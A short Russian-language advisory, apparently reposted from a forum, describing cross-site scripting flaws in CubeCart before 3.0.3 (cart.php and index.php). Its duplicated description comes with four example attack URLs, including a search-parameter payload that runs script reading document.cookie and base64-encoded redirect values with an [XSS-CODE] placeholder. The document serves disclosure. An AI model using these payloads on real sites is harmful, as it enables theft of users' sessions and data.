Межсайтовый скриптинг в CubeCart версии до 3.0.3
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость существует в сценариях 'cart.php' и 'index.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
:zns2: Домашняя страница
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость существует в сценариях 'cart.php' и 'index.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
Код:
http://[target]/cc3/cart.php?act=reg&redir=L3NpdGU
vZGVtby9jYzMvaW5kZXgucGhwP3NlY XJjaFN0c
j0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCU
yOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZp
ZXdDYXQmYW1wO1N1Ym1pdD1Hbw==[XSS-CODE]
Код:
http://[target]/cc3/cart.php?act=reg &redir=[XSS-CODE]
Код:
http://[target]/cc3/index.php?searchStr=%3D%22%3E%3C
script%3Ealert%28document.cookie%29%3C%2Fscript
%3E&act=viewCat&Submit=Go
Код:
http://[target]/cc3/i ndex.php?act=login&redir=L3NpdGUvZ
GVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJ
mFtcDtkb2NJZD0x[XSS-CODE]:zns2: Домашняя страница